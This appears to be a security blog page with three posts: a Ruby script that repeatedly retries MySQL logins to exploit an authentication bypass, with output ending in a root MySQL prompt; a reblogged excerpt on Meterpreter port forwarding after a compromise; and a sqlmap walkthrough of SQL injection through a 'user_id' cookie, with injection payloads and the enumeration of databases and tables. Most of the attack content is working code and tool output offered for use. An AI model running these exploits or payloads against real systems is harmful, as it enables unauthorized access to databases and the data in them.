MySQL Authentication bypass Exploit (Latest)

MySQL authentication bypass latest exploit

#!/usr/bin/ruby
#corenumb
#corenumb.wordpress.com
if ARGV[1]
        while true
                system("mysql -u #{ARGV[0]} mysql --password=blah -h #{ARGV[1]}")
                #sleep 0.1
        end

else
        puts " useage : file.rb root localhost"
end

Output

corenumb@hex-VPCCW16FB:~/pentest$ ruby mysql.rb root localhost
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8754
Server version: 5.5.22-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

Nice article about post port forwarding on post exploit

Penetration Testing Lab

The main purpose of port forwarding while performing a penetration test is to help us reach a specific port on a system that doesn’t exist on the same network.In order to understand this better let’s assume that we have compromised a system which belongs to two networks.The one network is the public that we managed to gain access and the other one is the private that other systems exists as well.

All we have to do is to set up a local listener to our machine that would communicate with the meterpreter session that we have opened from the compromised system.This meterpreter session will actually forward the port to the machine that is running the service and is not accessible directly from our system.

Let’s say that we have successfully exploited the system through a vulnerability and we have opened a meterpreter session.The first thing that we have to do…

View original post 312 more words

MySQL Injection through Cookies

well this is been out there for a while now . but still I thought of writing a simple tut of SQL Injection trough cookies

What are Cookies ?

A cookie is a message given to a Web browser by a Web server. The browser stores the message in a text file. The message is then sent back to the server each time the browser requests a page from the server. for a example mostly cookies are used to keep a user logged in without making him logging every each time he refreshes the web page

at the moment our current target Cookie Value is the following

PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1

SQL Injection With sqlmap

for this example I’ve used sqlmap sql injector which is a very advance sql injector . the vulnerable cookie parameter is “user_id”

Vulnerbility Identifying 

root@core-VPCCW16FB:# ./sqlmap.py --cookie="PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1" -u "http://localhost/index.php" -p"user_id" --level 3 --dbms=MYSQL

    sqlmap/1.0-dev (r5108) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

....
[11:30:45] [INFO] heuristic test shows that Cookie parameter 'user_id' might be injectable (possible DBMS: MySQL)
[11:30:45] [INFO] testing sql injection on Cookie parameter 'user_id'
[11:30:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:30:45] [INFO] Cookie parameter 'user_id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[11:30:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:30:46] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[11:30:46] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[11:30:46] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[11:30:46] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[11:30:46] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:30:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:30:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:30:56] [INFO] Cookie parameter 'user_id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[11:30:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:30:56] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[11:30:56] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:30:56] [INFO] target url appears to have 3 columns in query
[11:30:56] [INFO] Cookie parameter 'user_id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
Cookie parameter 'user_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
---
Place: Cookie
Parameter: user_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1 AND 8697=8697

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a676d7a3a,0x595844575a4975764376,0x3a6972633a), NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1 AND SLEEP(5)
---

[11:30:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0.11

Current Database

./sqlmap.py --cookie="PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1" -u "http://localhost/index.php" -p"user_id" --current-db

...
current database:    'test'

Table List

./sqlmap.py --cookie="PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1" -u "http://localhost/index.php" -p"user_id" --tables -D'test'
...
Database: test
[1 table]
+------+
| test |
+------+

and it will keep on going like the normal SQL Injection

Cya ..